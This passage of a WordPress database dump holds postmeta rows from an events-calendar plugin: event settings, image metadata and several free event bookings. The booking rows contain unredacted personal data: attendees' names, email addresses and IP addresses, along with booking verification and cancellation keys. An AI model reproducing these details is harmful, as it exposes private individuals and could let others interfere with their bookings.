25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(165953,266844,'mec_tickets','a:0:{}'),(165954,266844,'mec_fees_global_inheritance','1'),(165955,266844,'mec_fees','a:0:{}'),(165956,266844,'mec_ticket_variations_global_inheritance','1'),(165957,266844,'mec_ticket_variations','a:0:{}'),(165958,266844,'mec_reg_fields_global_inheritance','1'),(165959,266844,'mec_reg_fields','a:0:{}'),(165960,266844,'mec_bfixed_fields','a:0:{}'),(165961,266844,'mec_op','a:0:{}'),(165962,266844,'mec_fields','a:0:{}'),(165963,266844,'mec_event_status','EventScheduled'),(165964,266844,'mec_moved_online_link',''),(165965,266844,'mec_cancelled_reason',''),(165966,266844,'mec_display_cancellation_reason_in_single_page',''),(165967,266844,'boldgrid_hide_page_title','0'),(165968,266844,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(165969,266844,'passster_activate_global_protection',NULL),(165970,266844,'passster_activate_protection',NULL),(165971,266844,'passster_protection_type','password'),(165972,266844,'boldgrid_in_page_containers','1'),(165973,266844,'_dp_original','265240'),(165974,266844,'_edit_lock','1658927697:15'),(165975,266844,'_edit_last','15'),(165976,266845,'_wp_attached_file','2022/07/HealthHealing.png'),(165977,266845,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:676;s:6:\"height\";i:380;s:4:\"file\";s:25:\"2022/07/HealthHealing.png\";s:8:\"filesize\";i:360315;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"HealthHealing-300x169.png\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:82082;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"HealthHealing-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:38248;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:25:\"HealthHealing-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:131292;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:25:\"HealthHealing-474x324.png\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:217770;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:25:\"HealthHealing-391x260.png\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:153170;}s:8:\"tileview\";a:5:{s:4:\"file\";s:25:\"HealthHealing-300x380.png\";s:5:\"width\";i:300;s:6:\"height\";i:380;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:164685;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(165978,266844,'_thumbnail_id','266845'),(165979,266845,'original-file','2022/07/HealthHealing-updraft-pre-smush-original.png'),(165980,266845,'smush-info','The file was compressed from 351.87 KB to 125.42 KB saving 64.35 percent using WP-Optimize'),(165982,266845,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:360315;s:12:\"smushed-size\";i:128435;s:15:\"savings-percent\";d:64.35;s:10:\"sizes-info\";a:6:{s:4:\"full\";a:2:{s:8:\"original\";i:360315;s:10:\"compressed\";i:128435;}s:6:\"medium\";a:2:{s:8:\"original\";i:82082;s:10:\"compressed\";i:29102;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:38248;s:10:\"compressed\";i:15254;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:131292;s:10:\"compressed\";i:50069;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:153170;s:10:\"compressed\";i:55003;}s:8:\"tileview\";a:2:{s:8:\"original\";i:164685;s:10:\"compressed\";i:64564;}}}'),(165981,266845,'smush-complete','1'),(165983,266846,'mec_transaction_id','FGB37612'),(165984,266846,'mec_user_id','1000024'),(165985,266846,'mec_verified','1'),(165986,266846,'mec_verification_key','9ecf23e1511271603e50490e29faa91d'),(165987,266846,'mec_cancellation_key','20d801a463b7810f4aca6f9aca66cdfb'),(165988,266846,'mec_confirmed','1'),(165989,266846,'mec_event_id','266820'),(165990,266846,'mec_date','1657449000:1657495800'),(165991,266846,'mec_ticket_id',',1,'),(165992,266846,'mec_booking_time','2022-07-06 21:34:07'),(165993,266846,'mec_all_dates','a:0:{}'),(165994,266846,'mec_other_dates','a:0:{}'),(165995,266846,'mec_attention_time','1657449000:1657495800'),(165996,266846,'mec_attention_time_start','1657449000'),(165997,266846,'mec_attention_time_end','1657495800'),(165998,266846,'mec_book_date_submit','20220706213407'),(165999,266846,'mec_booking_location','129'),(166000,266846,'mec_ticket_price_1','0'),(166001,266846,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:20:\"rmorandi@comcast.net\";s:4:\"name\";s:13:\"Roger Morandi\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:13:\"73.98.136.116\";}}'),(166002,266846,'mec_price','0'),(166003,266846,'mec_gateway','MEC_gateway_free'),(166004,266846,'mec_gateway_label','Free'),(166005,266847,'mec_transaction_id','ETD58832'),(166006,266847,'mec_user_id','1000015'),(166007,266847,'mec_verified','1'),(166008,266847,'mec_verification_key','3c87c99fbf4ac0d6577f5ae166274839'),(166009,266847,'mec_cancellation_key','757cd0bf41916d36f4d9d2afc75987c9'),(166010,266847,'mec_confirmed','1'),(166011,266847,'mec_event_id','266611'),(166012,266847,'mec_date','1658257200:1658260800'),(166013,266847,'mec_ticket_id',',1,'),(166014,266847,'mec_booking_time','2022-07-07 06:53:57'),(166015,266847,'mec_all_dates','a:0:{}'),(166016,266847,'mec_other_dates','a:0:{}'),(166017,266847,'mec_attention_time','1658257200:1658260800'),(166018,266847,'mec_attention_time_start','1658257200'),(166019,266847,'mec_attention_time_end','1658260800'),(166020,266847,'mec_book_date_submit','20220707065357'),(166021,266847,'mec_booking_location','144'),(166022,266847,'mec_ticket_price_1','0'),(166023,266847,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:22:\"lindamaryk@hotmail.com\";s:4:\"name\";s:10:\"Linda Mary\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:13:\"47.35.179.159\";}}'),(166024,266847,'mec_price','0'),(166025,266847,'mec_gateway','MEC_gateway_free'),(166026,266847,'mec_gateway_label','Free'),(166027,266848,'mec_transaction_id','HBU30082'),(166028,266848,'mec_user_id','1000015'),(166029,266848,'mec_verified','1'),(166030,266848,'mec_verification_key','cb7cfed6d15c207e6db89b89d63b5388'),(166031,266848,'mec_cancellation_key','250ce1f359f225a824cc464f00ae323c'),(166032,266848,'mec_confirmed','1'),(166033,266848,'mec_event_id','266604'),(166034,266848,'mec_date','1658058300:1658062800'),(166035,266848,'mec_ticket_id',',1,'),(166036,266848,'mec_booking_time','2022-07-07 06:57:33'),(166037,266848,'mec_all_dates','a:0:{}'),(166038,266848,'mec_other_dates','a:0:{}'),(166039,266848,'mec_attention_time','1658058300:1658062800'),(166040,266848,'mec_attention_time_start','1658058300'),(166041,266848,'mec_attention_time_end','1658062800'),(166042,266848,'mec_book_date_submit','20220707065733'),(166043,266848,'mec_booking_location','118'),(166044,266848,'mec_ticket_price_1','0'),(166045,266848,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:22:\"lindamaryk@hotmail.com\";s:4:\"name\";s:10:\"Linda Mary\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:13:\"47.35.179.159\";}}'),(166046,266848,'mec_price','0'),(166047,266848,'mec_gateway','MEC_gateway_free'),(166048,266848,'mec_gateway_label','Free'),(166049,266849,'protect_children',''),(166050,266849,'mec_color',''),(166051,266849,'mec_location_id','118'),(166052,266849,'mec_dont_show_map','0'),(166053,266849,'mec_organizer_id','1'),(166054,266849,'mec_read_more',''),(166055,266849,'mec_more_info',''),(166056,266849,'mec_more_info_title',''),(166057,266849,'mec_more_info_target','_self'),(166058,266849,'mec_cost',''),(166059,266849,'mec_currency','a:0:{}'),(166060,266849,'mec_additional_organizer_ids','a:0:{}'),(166061,266849,'mec_additional_location_ids','a:0:{}'),(166062,266849,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-07-19\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-07-19\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(166063,266849,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(166064,266849,'mec_certain_weekdays','a:0:{}'),(166065,266849,'mec_allday','0'),(166066,266849,'one_occurrence','0'),(166067,266849,'mec_hide_time','0'),(166068,266849,'mec_hide_end_time','0'),(166069,266849,'mec_comment',''),(166070,266849,'mec_timezone','global'),(166071,266849,'mec_countdown_method','global'),(166072,266849,'mec_public','1'),(166073,266849,'mec_start_date','2022-07-19'),(166074,266849,'mec_start_time_hour','7'),(166075,266849,'mec_start_time_minutes','0'),(166076,266849,'mec_start_time_ampm','PM'),(166077,266849,'mec_start_day_seconds','68400'),(166078,266849,'mec_end_date','2022-07-19'),(166079,266849,'mec_end_time_hour','8'),(166080,266849,'mec_end_time_minutes','0'),(166081,266849,'mec_end_time_ampm','PM'),(166082,266849,'mec_end_day_seconds','72000'),(166083,266849,'mec_repeat_status','0'),(166084,266849,'mec_repeat_type',''),(166085,266849,'mec_repeat_interval','1'),(166086,266849,'mec_repeat_end',''),(166087,266849,'mec_repeat_end_at_occurrences',''),(166088,266849,'mec_repeat_end_at_date',''),(166089,266849,'mec_advanced_days','a:0:{}'),(166090,266849,'mec_in_days',''),(166091,266849,'mec_not_in_days',''),(166092,266849,'mec_hourly_schedules','a:0:{}'),(166093,266849,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(166094,266849,'mec_tickets','a:0:{}'),(166095,266849,'mec_fees_global_inheritance','1'),(166096,266849,'mec_fees','a:0:{}'),(166097,266849,'mec_ticket_variations_global_inheritance','1'),(166098,266849,'mec_ticket_variations','a:0:{}'),(166099,266849,'mec_reg_fields_global_inheritance','1'),(166100,266849,'mec_reg_fields','a:0:{}'),(166101,266849,'mec_bfixed_fields','a:0:{}'),(166102,266849,'mec_op','a:0:{}'),(166103,266849,'mec_fields','a:0:{}'),(166104,266849,'mec_event_status','EventScheduled'),(166105,266849,'mec_moved_online_link',''),(166106,266849,'mec_cancelled_reason',''),(166107,266849,'mec_display_cancellation_reason_in_single_page',''),(166108,266849,'boldgrid_hide_page_title','0'),(166109,266849,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(166110,266849,'passster_activate_global_protection',NULL),(166111,266849,'passster_activate_protection',NULL),(166112,266849,'passster_protection_type','password'),(166115,266849,'_dp_original','266104'),(166114,266849,'boldgrid_in_page_containers','1'),(166116,266849,'_edit_lock','1657235192:15'),(166117,266849,'_edit_last','15'),(166118,266850,'_wp_attached_file','2022/07/EckCommunity.webp'),(166119,266850,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:676;s:6:\"height\";i:380;s:4:\"file\";s:25:\"2022/07/EckCommunity.webp\";s:8:\"filesize\";i:48678;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"EckCommunity-300x169.webp\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:19122;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"EckCommunity-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:9564;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:25:\"EckCommunity-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:24988;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:25:\"EckCommunity-474x324.webp\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:40816;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:25:\"EckCommunity-391x260.webp\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:30742;}s:8:\"tileview\";a:5:{s:4:\"file\";s:25:\"EckCommunity-300x380.webp\";s:5:\"width\";i:300;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:25984;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(166120,266849,'_thumbnail_id','266850'),(166121,266850,'smush-info','Failed with error code invalid_file_type - /home/eckank5/public_html/wp-content/uploads/2022/07/EckCommunity.webp - cannot be optimized, it has an invalid file type'),(166122,266850,'smush-complete',''),(166123,266851,'mec_transaction_id','FGM19808'),(166124,266851,'mec_user_id','1000023'),(166125,266851,'mec_verified','1'),(166126,266851,'mec_verification_key','f546b106728f7a4432450c79007f37ec'),(166127,266851,'mec_cancellation_key','2af005c4139db0d2c43cc2301671afa6'),(166128,266851,'mec_confirmed','1'),(166129,266851,'mec_event_id','266820'),(166130,266851,'mec_date','1657449000:1657495800'),(166131,266851,'mec_ticket_id',',1,'),(166132,266851,'mec_booking_time','2022-07-09 22:34:18'),(166133,266851,'mec_all_dates','a:0:{}'),(166134,266851,'mec_other_dates','a:0:{}'),(166135,266851,'mec_attention_time','1657449000:1657495800'),(166136,266851,'mec_attention_time_start','1657449000'),(166137,266851,'mec_attention_time_end','1657495800'),(166138,266851,'mec_book_date_submit','20220709223418'),(166139,266851,'mec_booking_location','129'),(166140,266851,'mec_ticket_price_1','0'),(166141,266851,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:19:\"bngstreet@gmail.com\";s:4:\"name\";s:19:\"Bonnie Greenstreet \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:12:\"184.55.32.29\";}}'),(166142,266851,'mec_price','0'),(166143,266851,'mec_gateway','MEC_gateway_free'),(166144,266851,'mec_gateway_label','Free'),(166145,266852,'mec_transaction_id','YVR35929'),(166146,266852,'mec_user_id','1000033'),(166147,266852,'mec_verified','1'),(166148,266852,'mec_verification_key','421ec738f8d9c9b945aa5ab5d87d9594'),(166149,266852,'mec_cancellation_key','299fe8f5e12900f8e4ea8f5afacfed25'),(166150,266852,'mec_confirmed','1'),(166151,266852,'mec_event_id','266820'),(166152,266852,'mec_date','1657449000:1657495800'),(166153,266852,'mec_ticket_id',',1,'),(166154,266852,'mec_booking_time','2022-07-10 01:48:21'),(166155,266852,'mec_all_dates','a:0:{}'),(166156,266852,'mec_other_dates','a:0:{}'),(166157,266852,'mec_attention_time','1657449000:1657495800'),(166158,266852,'mec_attention_time_start','1657449000'),(166159,266852,'mec_attention_time_end','1657495800'),(166160,266852,'mec_book_date_submit','20220710014821'),(166161,266852,'mec_booking_location','129'),(166162,266852,'mec_ticket_price_1','0'),(166163,266852,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:15:\"harusan@aol.com\";s:4:\"name\";s:5:\"Hal H\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:13:\"172.56.97.146\";}}'),(166164,266852,'mec_price','0'),(166165,266852,'mec_gateway','MEC_gateway_free'),(166166,266852,'mec_gateway_label','Free'),(166167,266853,'mec_transaction_id','XDS71085'),(166168,266853,'mec_user_id','1000033'),(166169,266853,'mec_verified','1'),(166170,266853,'mec_verification_key','ef85d23f9002eb47d81d2103fcfa68fb'),(166171,266853,'mec_cancellation_key','5efd0ec87bcb5d226cfca663a5ac6094'),(166172,266853,'mec_confirmed','1'),(166173,266853,'mec_event_id','266820'),(166174,266853,'mec_date','1657449000:1657495800'),(166175,266853,'mec_ticket_id',',1,'),(166176,266853,'mec_booking_time','2022-07-10 09:40:39'),(166177,266853,'mec_all_dates','a:0:{}'),(166178,266853,'mec_other_dates','a:0:{}'),(166179,266853,'mec_attention_time','1657449000:1657495800'),(166180,266853,'mec_attention_time_start','1657449000'),(166181,266853,'mec_attention_time_end','1657495800'),(166182,266853,'mec_book_date_submit','20220710094039'),(166183,266853,'mec_booking_location','129'),(166184,266853,'mec_ticket_price_1','0'),(166185,266853,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:15:\"harusan@aol.com\";s:4:\"name\";s:11:\"Hal Garnett\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:11:\"97.96.45.77\";}}'),(166186,266853,'mec_price','0'),(166187,266853,'mec_gateway','MEC_gateway_free'),(166188,266853,'mec_gateway_label','Free'),(166189,266854,'mec_transaction_id','UWY19613'),(166190,266854,'mec_user_id','1000006'),(166191,266854,'mec_verified','1'),(166192,266854,'mec_verification_key','d38738a0c766452190d9e46196fdfc36'),(166193,266854,'mec_cancellation_key','c7b55bea97b19130452963b70e1fcdf2'),(166194,266854,'mec_confirmed','1'),(166195,266854,'mec_event_id','266820'),(166196,266854,'mec_date','1657449000:1657495800'),(166197,266854,'mec_ticket_id',',1,'),(166198,266854,'mec_booking_time','2022-07-10 09:44:17'),(166199,266854,'mec_all_dates','a:0:{}'),(166200,266854,'mec_other_dates','a:0:{}'),(166201,266854,'mec_attention_time','1657449000:1657495800'),(166202,266854,'mec_attention_time_start','1657449000'),(166203,266854,'mec_attention_time_end','1657495800'),(166204,266854,'mec_book_date_submit','20220710094417'),(166205,266854,'mec_booking_location','129'),(166206,266854,'mec_ticket_price_1','0'),(166207,266854,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:18:\"dogle007@yahoo.com\";s:4:\"name\";s:13:\"Dave Ogletree\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:13:\"73.153.57.183\";}}'),(166208,266854,'mec_price','0'),(166209,266854,'mec_gateway','MEC_gateway_free'),(166210,266854,'mec_gateway_label','Free'),(166211,266855,'mec_transaction_id','PKC99995'),(166212,266855,'mec_user_id','1000006'),(166213,266855,'mec_verified','1'),(166214,266855,'mec_verification_key','50697dc4bda99253b0e4ffd5ad06188b'),(166215,266855,'mec_cancellation_key','b97318e33680950bd5c72124b02f7e2e'),(166216,266855,'mec_confirmed','1'),(166217,266855,'mec_event_id','266820'),(166218,266855,'mec_date','1657449000:1657495800'),(166219,266855,'mec_ticket_id',',1,'),(166220,266855,'mec_booking_time','2022-07-10 10:00:43'),(166221,266855,'mec_all_dates','a:0:{}'),(166222,266855,'mec_other_dates','a:0:{}'),(166223,266855,'mec_attention_time','1657449000:1657495800'),(166224,266855,'mec_attention_time_start','1657449000'),(166225,266855,'mec_attention_time_end','1657495800'),(166226,266855,'mec_book_date_submit','20220710100043'),(166227,266855,'mec_booking_location','129'),(166228,266855,'mec_ticket_price_1','0'),(166229,266855,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:18:\"dogle007@yahoo.com\";s:4:\"name\";s:13:\"Dave Ogletree\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:13:\"73.153.57.183\";}}'),(166230,266855,'mec_price','0'),(166231,266855,'mec_gateway','MEC_gateway_free'),(166232,266855,'mec_gateway_label','Free'),(166233,266856,'mec_transaction_id','KLR12655'),(166234,266856,'mec_user_id','1000022'),(166235,266856,'mec_verified','1'),(166236,266856,'mec_verification_key','9374231cc8bd47b78d7f3a7ab46c3a58'),(166237,266856,'mec_cancellation_key','25661c88fd6493d36fdea5bea308f4c4'),(166238,266856,'mec_confirmed','1'),(166239,266856,'mec_event_id','266820'),(166240,266856,'mec_date','1657449000:1657495800'),(166241,266856,'mec_ticket_id',',1,'),(166242,266856,'mec_booking_time','2022-07-10 10:02:11'),(166243,266856,'mec_all_dates','a:0:{}'),(166244,266856,'mec_other_dates','a:0:{}'),(166245,266856,'mec_attention_time','1657449000:1657495800'),(166246,266856,'mec_attention_time_start','1657449000'),(166247,266856,'mec_attention_time_end','1657495800'),(166248,266856,'mec_book_date_submit','20220710100211'),(166249,266856,'mec_booking_location','129'),(166250,266856,'mec_ticket_price_1','0'),(166251,266856,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:20:\"jiuuumaluk@gmail.com\";s:4:\"name\";s:14:\"Jorge Santiago\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:11:\"24.2.77.216\";}}'),(166252,266856,'mec_price','0'),(166253,266856,'mec_gateway','MEC_gateway_free'),(166254,266856,'mec_gateway_label','Free'),(166255,266857,'mec_transaction_id','VQY60201'),(166256,266857,'mec_user_id','1000014'),(166257,266857,'mec_verified','1'),(166258,266857,'mec_verification_key','888f09a01edff1dd3546c5f3ec538ef3'),(166259,266857,'mec_cancellation_key','0b8372ad3d22ca0e930293cdcadc9b3a'),(166260,266857,'mec_confirmed','1'),(166261,266857,'mec_event_id','266820'),(166262,266857,'mec_date','1657449000:1657495800'),(166263,266857,'mec_ticket_id',',1,'),(166264,266857,'mec_booking_time','2022-07-10 10:02:42'),(166265,266857,'mec_all_dates','a:0:{}'),(166266,266857,'mec_other_dates','a:0:{}'),(166267,266857,'mec_attention_time','1657449000:1657495800'),(166268,266857,'mec_attention_time_start','1657449000'),(166269,266857,'mec_attention_time_end','1657495800'),(166270,266857,'mec_book_date_submit','20220710100242'),(166271,266857,'mec_booking_location','129'),(166272,266857,'mec_ticket_price_1','0'),(166273,266857,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:19:\"keanchico@yahoo.com\";s:4:\"name\";s:11:\"kery colvin\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:11:\"24.128.6.87\";}}'),(166274,266857,'mec_price','0'),(166275,266857,'mec_gateway','MEC_gateway_free'),(166276,266857,'mec_gateway_label','Free'),(166277,266858,'mec_transaction_id','UGM28529'),(166278,266858,'mec_user_id','1000021'),(166279,266858,'mec_verified','1'),(166280,266858,'mec_verification_key','0eb7c7e4ebecdc12c5ed7384a671cc0d'),(166281,266858,'mec_cancellation_key','31a0cdda7d50fdbe52d1dd95691dc10a'),(166282,266858,'mec_confirmed','1'),(166283,266858,'mec_event_id','266820'),(166284,266858,'mec_date','1657449000:1657495800'),(166285,266858,'mec_ticket_id',',1,'),(166286,266858,'mec_booking_time','2022-07-10 10:03:39'),(166287,266858,'mec_all_dates','a:0:{}'),(166288,266858,'mec_other_dates','a:0:{}'),(166289,266858,'mec_attention_time','1657449000:1657495800'),(166290,266858,'mec_attention_time_start','1657449000'),(166291,266858,'mec_attention_time_end','1657495800'),(166292,266858,'mec_book_date_submit','20220710100339'),(166293,266858,'mec_booking_location','129'),(166294,266858,'mec_ticket_price_1','0'),(166295,266858,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:20:\"choll.03@comcast.net\";s:4:\"name\";s:12:\"Test Message\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:14:\"76.130.120.198\";}}'),(166296,266858,'mec_price','0'),(166297,266858,'mec_gateway','MEC_gateway_free'),(166298,266858,'mec_gateway_label','Free'),(166299,266859,'mec_transaction_id','FNV15669'),(166300,266859,'mec_user_id','1000006'),(166301,266859,'mec_verified','1'),(166302,266859,'mec_verification_key','0bf6bdb6892d113f356a1d9af4fdb7b2'),(166303,266859,'mec_cancellation_key','18bdc3f0736c55c3314a818b5f7333e5'),(166304,266859,'mec_confirmed','1'),(166305,266859,'mec_event_id','266820'),(166306,266859,'mec_date','1657449000:1657495800'),(166307,266859,'mec_ticket_id',',1,'),(166308,266859,'mec_booking_time','2022-07-10 10:03:58'),(166309,266859,'mec_all_dates','a:0:{}'),(166310,266859,'mec_other_dates','a:0:{}'),(166311,266859,'mec_attention_time','1657449000:1657495800'),(166312,266859,'mec_attention_time_start','1657449000'),(166313,266859,'mec_attention_time_end','1657495800'),(166314,266859,'mec_book_date_submit','20220710100358'),(166315,266859,'mec_booking_location','129'),(166316,266859,'mec_ticket_price_1','0'),(166317,266859,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:18:\"dogle007@yahoo.com\";s:4:\"name\";s:13:\"Dave 